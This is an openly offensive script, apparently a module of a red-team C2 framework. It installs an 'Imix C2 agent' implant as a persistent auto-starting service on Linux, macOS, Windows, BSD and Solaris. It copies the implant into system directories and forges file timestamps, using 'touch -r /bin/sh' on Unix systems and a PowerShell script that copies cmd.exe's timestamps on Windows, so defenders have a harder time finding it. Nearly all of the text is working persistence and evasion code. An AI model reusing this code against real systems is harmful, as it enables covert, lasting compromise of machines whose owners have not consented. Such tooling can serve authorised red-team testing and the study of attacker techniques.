systemd_service_template = """[Unit]
Description={{ SERVICE_DESC }}
Requires=network.target
After=network.target

[Service]
Type=simple
{% if SERVICE_WORKING_DIR is defined %}
WorkingDirectory={{ SERVICE_WORKING_DIR }}
{% endif %}
ExecStart={{ SERVICE_START_CMD }}
{% if SERVICE_STOP_CMD is defined %}
ExecStop={{ SERVICE_STOP_CMD }}
{% endif %}
{% if SERVICE_START_PRE_CMD is defined %}
ExecStartPre={{ SERVICE_START_PRE_CMD }}
{% endif %}
{% if SERVICE_PID_FILE is defined %}
PIDFile={{ SERVICE_PID_FILE }}
{% endif %}

[Install]
WantedBy=multi-user.target
"""

sysvinit_template = """#!/bin/sh
### BEGIN INIT INFO
# Provides:          {{ SERVICE_NAME }}
# Required-Start:    $remote_fs $syslog
# Required-Stop:     $remote_fs $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: {{ SERVICE_DESC }}
# Description:       {{ SERVICE_DESC }}
### END INIT INFO

cmd={{ SERVICE_START_CMD }}

name=`basename $0`
pid_file="/var/run/$name.pid"

get_pid() {
    cat "$pid_file"
}

is_running() {
    [ -f "$pid_file" ] && ps -p `get_pid` > /dev/null 2>&1
}


case "$1" in
    start)
    if is_running; then
        echo "Already started"
    else
        echo "Starting $name"
        cd "$dir"

        $cmd &

        echo $! > "$pid_file"
        if ! is_running; then
            echo "Unable to start, see $stdout_log and $stderr_log"
            exit 1
        fi
    fi
    ;;
    stop)
    if is_running; then
        echo -n "Stopping $name.."
        kill `get_pid`
        for i in 1 2 3 4 5 6 7 8 9 10
        do
            if ! is_running; then
                break
            fi

            echo -n "."
            sleep 1
        done
        echo

        if is_running; then
            echo "Not stopped; may still be shutting down or shutdown may have failed"
            exit 1
        else
            echo "Stopped"
            if [ -f "$pid_file" ]; then
                rm "$pid_file"
            fi
        fi
    else
        echo "Not running"
    fi
    ;;
    restart)
    $0 stop
    if is_running; then
        echo "Unable to stop, will not attempt to start"
        exit 1
    fi
    $0 start
    ;;
    status)
    if is_running; then
        echo "Running"
    else
        echo "Stopped"
        exit 1
    fi
    ;;
    *)
    echo "Usage: $0 {start|stop|restart|status}"
    exit 1
    ;;
esac

exit 0
"""

launch_daemon_template = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>{{ service_name }}</string>
    <key>Program</key>
    <string>{{ bin_path }}</string>
    <key>ProgramArguments</key>
    <array>
        <string>{{ bin_args }}</string>
    </array>
    <key>KeepAlive</key>
    <true/>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>300</integer>
</dict>
</plist>
"""

bsdinit_template = """
#!/bin/sh
#
# PROVIDE: {{ service_name }}
# REQUIRE: LOGIN FILESYSTEMS
# KEYWORD: shutdown

. /etc/rc.subr

name="{{ service_name }}"
rcvar="{{ service_name }}_enable"

# The command to start the service
command="{{ service_start_cmd }}"
# Additional command arguments if any
command_args=""

# Load the rc.subr script
load_rc_config $name
: ${name}_enable:=no }

# Define the function to start the service
start_cmd="${name}_start"

# Start function
{{ service_name }}_start() {
    echo "Starting {{ service_name }}."
    # Execute the command to start the service
    ${command} ${command_args} &
}

# Define the function to stop the service
stop_cmd="${name}_stop"

# Stop function
{{ service_name }}_stop() {
    echo "Stopping {{ service_name }}."
    # Command to stop the service if required
    # For example, if {{ service_name }} supports graceful shutdown:
    # killall -SIGTERM {{ service_name }}
}

# Define the function to check if the service is running
status_cmd="${name}_status"

# Status function
{{ service_name }}_status() {
    # Check if the service is running
    # For example, check if the process exists
    if pgrep -q -x "{{ service_name }}"; then
        echo "{{ service_name }} is not running."
    else
        echo "{{ service_name }} is not running."
    fi
}

# Define command line arguments to control the service
# e.g., {{ service_name }}_enable="YES" to enable the service

# Start the service automatically during system startup
{{ service_name }}_enable="YES"

# Call the rc.subr functions to handle the service
run_rc_command "$1"
"""

smf_template = """<?xml version="1.0"?>
<!DOCTYPE service_bundle SYSTEM "/usr/share/lib/xml/dtd/service_bundle.dtd.1">
<service_bundle type="manifest" name="system/{{ SERVICE_NAME }}">

  <service name="system/{{ SERVICE_NAME }}" type="service" version="1">

    <create_default_instance enabled="true"/>

    <single_instance/>

    <dependency name="network" grouping="require_all" restart_on="error" type="service">
      <service_fmri value="svc:/milestone/network:default"/>
    </dependency>

    <exec_method type="method" name="start" exec="{{ SERVICE_START_CMD }}" timeout_seconds="60"/>

    <exec_method type="method" name="stop" exec=":kill" timeout_seconds="60"/>

    <property_group name="startd" type="framework">
      <propval name="duration" type="astring" value="contract"/>
    </property_group>

  </service>
</service_bundle>
"""


def is_using_systemd():
    command_get_res = sys.shell("command -v systemctl")
    if command_get_res['status'] == 0 and file.is_file(command_get_res['stdout'].strip()):
        for canary in ["/run/systemd/system/", "/dev/.run/systemd/", "/dev/.systemd/"]:
            if file.is_dir(canary):
                return True
    return False


def is_using_sysvinit():
    command_get_res = sys.shell("command -v update-rc.d")
    if command_get_res['status'] == 0 and file.is_file(command_get_res['stdout'].strip()):
        return True
    return False


def is_using_bsdinit():
    # Lol this is how ansible does it too :shrug:
    # https://github.com/ansible/ansible/blob/386edc666ec2a053b4d576fc4b2deeb46fe492b8/lib/ansible/module_utils/facts/system/service_mgr.py#L124
    if sys.get_os()['platform'] == "BSD":
        return True
    return False

def is_using_smf():
    command_get_res = sys.shell("command -v svcadm")
    if command_get_res['status'] == 0 and file.is_file(command_get_res['stdout'].strip()):
        return True
    return False

def systemd(service_name, service_desc, executable_path, executable_args):
    # assets.copy("persist_service/files/systemd.service.j2","/tmp/systemd.service.j2")
    file.write("/tmp/systemd.service.j2", systemd_service_template)
    args = {
        "SERVICE_NAME": service_name,
        "SERVICE_DESC": service_desc,
        "SERVICE_START_CMD": executable_path+" "+executable_args
    }
    file.template("/tmp/systemd.service.j2",
                  "/usr/lib/systemd/system/"+service_name+".service", args, False)
    file.remove("/tmp/systemd.service.j2")

    # assets.copy("persist_service/files/payload.elf", executable_path)
    sys.shell("chmod +x "+executable_path)
    sys.shell(f"touch -r /bin/sh {executable_path}")
    sys.shell(
        f"touch -r /bin/sh /usr/lib/systemd/system/{service_name}.service")

    sys.shell("systemctl daemon-reload "+service_name)
    sys.shell("systemctl enable "+service_name)
    sys.shell("systemctl start "+service_name)
    print("systemd installed")


def sysvinit(service_name, service_desc, executable_path, executable_args):
    # assets.copy("persist_service/files/sysvinit.sh.j2","/tmp/svc.sh.j2")
    file.write("/tmp/svc.sh.j2", sysvinit_template)
    args = {
        "SERVICE_NAME": service_name,
        "SERVICE_DESC": service_desc,
        "SERVICE_START_CMD": executable_path+" "+executable_args
    }
    file.template("/tmp/svc.sh.j2", "/etc/init.d/"+service_name, args, False)
    file.remove("/tmp/svc.sh.j2")
    sys.shell("chmod +x "+"/etc/init.d/"+service_name)

    # assets.copy("persist_service/files/payload.elf", executable_path)
    sys.shell("chmod +x "+executable_path)
    sys.shell(f"touch -r /bin/sh {executable_path}")
    sys.shell(f"touch -r /bin/sh /etc/init.d/{service_name}")

    sys.shell("update-rc.d "+service_name+" defaults")
    sys.shell("service "+service_name+" start")
    print("sysvinit installed")


def bsdinit(service_name, service_desc, executable_path, executable_args):
    startup_dir = "/usr/local/etc/rc.d/"
    if not file.is_dir(startup_dir):
        print(startup_dir+" not found")
        return

    file.write("/tmp/svc.sh.j2", bsdinit_template)
    args = {
        "service_name": service_name,
        "service_desc": service_desc,
        "service_start_cmd": executable_path+" "+executable_args
    }
    file.template("/tmp/svc.sh.j2", startup_dir +
                  service_name+".sh", args, False)
    file.remove("/tmp/svc.sh.j2")

    sys.shell("chmod +x "+startup_dir+service_name+".sh")
    sys.shell("chmod +x "+executable_path)
    sys.shell("service "+service_name+".sh start")

    print("bsdinit installed")


def launch_daemon(service_name, executable_path, executable_args):
    # assets.copy("persist_service/files/launch_daemon.plist.j2","/tmp/plist.j2")
    file.write("/tmp/plist.j2", launch_daemon_template)
    args = {
        "service_name": "com.testing."+service_name,
        "bin_path": executable_path,
        "bin_args": executable_args
    }
    file.template("/tmp/plist.j2", "/Library/LaunchDaemons/" +
                  service_name+".plist", args, False)
    file.remove("/tmp/plist.j2")

    # assets.copy("persist_service/files/payload.macho", executable_path)
    sys.shell("chmod +x "+executable_path)
    sys.shell("launchctl load -w /Library/LaunchDaemons/"+service_name+".plist")
    print("Launch daemon installed")

def smf(service_name, executable_path, executable_args):
    # assets.copy("persist_service/files/smf.xml.j2","/tmp/smf.xml.j2")
    file.write("/tmp/smf.xml.j2", smf_template)
    args = {
        "SERVICE_NAME": service_name,
        "SERVICE_START_CMD": f"{executable_path} {executable_args}"
    }
    file.template("/tmp/smf.xml.j2", "/lib/svc/manifest/system/"+service_name+".xml", args, False)
    file.remove("/tmp/smf.xml.j2")

    # assets.copy("persist_service/files/payload.elf", executable_path)
    sys.shell(f"chmod +x {executable_path}")
    sys.shell(f"touch -r /bin/sh {executable_path}")
    sys.shell(f"touch -r /bin/sh /lib/svc/manifest/system/{service_name}.xml")

    sys.shell(f"svccfg import /lib/svc/manifest/system/{service_name}.xml")
    sys.shell(f"svcadm enable {service_name}")
    print("SMF installed")


def windows_service_manager(service_name, service_display_name, service_description, executable_path, executable_args):
    binpath = executable_path
    if executable_args != "":
        binpath = executable_path + " " + executable_args
    create_res = sys.shell("sc.exe create "+service_name+" binpath= \""+binpath+
                           "\" displayname=\""+service_display_name+"\" start= auto type= own")
    if 'ERROR' in create_res['stdout'] or 'USAGE' in create_res['stdout'] or create_res['stderr'] != "":
        print("Failed to create service:\n"+str(create_res)+"\n")
        print("\n")
        return

    desc_res = sys.shell("sc.exe description "+service_name+" \""+service_description+"\"")
    if 'ERROR' in desc_res['stdout'] or 'USAGE' in create_res['stdout'] or desc_res['stderr'] != "":
        print("Failed to set service description:\n"+desc_res+"\n")
        print("\n")
        return

    start_res = sys.shell("sc.exe start "+service_name)
    if 'ERROR' in start_res['stdout'] or 'USAGE' in create_res['stdout'] or start_res['stderr'] != "":
        print("Failed to start service:\n"+str(start_res)+"\n")
        print("\n")
        return


def persist_service(service_name, service_desc, executable_name, executable_args, windows_display_name):
    src_path = process.info()['exe']
    if sys.is_linux():
        executable_path = "/bin/"+executable_name
        file.copy(src_path, executable_path)
        if is_using_systemd():
            systemd(service_name, service_desc,
                    executable_path, executable_args)
        elif is_using_sysvinit():
            sysvinit(service_name, service_desc,
                     executable_path, executable_args)
    elif sys.is_macos():
        executable_path = "/var/root/"+executable_name
        file.copy(src_path, executable_path)
        launch_daemon(service_name, executable_path, executable_args)
    elif sys.is_windows():
        executable_path = "C:\\Windows\\System32\\"+executable_name+".exe"
        file.copy(src_path, executable_path)
        sys.shell(f"""powershell /c "\$src = Get-Item 'C:\\Windows\\System32\\cmd.exe'; \$tgt = Get-Item '{executable_path}'; $tgt.CreationTime = $src.CreationTime; $tgt.LastWriteTime = $src.LastWriteTime; $tgt.LastAccessTime = $src.LastAccessTime" """)
        windows_service_manager(
            service_name, windows_display_name, service_desc, executable_path, executable_args)
    elif sys.get_os()['platform'] == "BSD":
        executable_path = "/bin/"+executable_name
        file.copy(src_path, executable_path)
        if is_using_bsdinit():
            bsdinit(service_name, service_desc,
                    executable_path, executable_args)
    elif sys.get_os()['platform'] == "Unknown: Solaris":
        executable_path = "/bin/"+executable_name
        file.copy(src_path, executable_path)
        if is_using_smf():
            smf(service_name, executable_path, executable_args)
    else:
        print("OS not supported")


def parse_and_persist(config_data):
    if len(config_data['service_configs']) < 1:
        print("Please add a service_config to your imix config")
    else:
        conf = config_data['service_configs'][0]
        persist_service(
            conf['name'],
            conf['description'],
            conf['executable_name'],
            conf['executable_args'],
            conf['windows_display_name'],
        )


"""
This script uses the first provided services_configs to install a service
On the local system. The config file specified for the install will be used
by the imix agent. The imix binary itself will be copied to the install
location. The original imix binary will still exist so you may wish to delete
it after running the install.

./imix install
"""


def main():
    config_data = {
        "service_configs": [
            {
                "name": "imixsvc",
                "windows_display_name": "Imix c2 agent",
                "description": "Imix C2 Agent",
                "executable_name": "imix",
                "executable_args": ""
            }
        ]
    }
    parse_and_persist(config_data)
    print("Implant copied, you may now delete this binary.")


main()
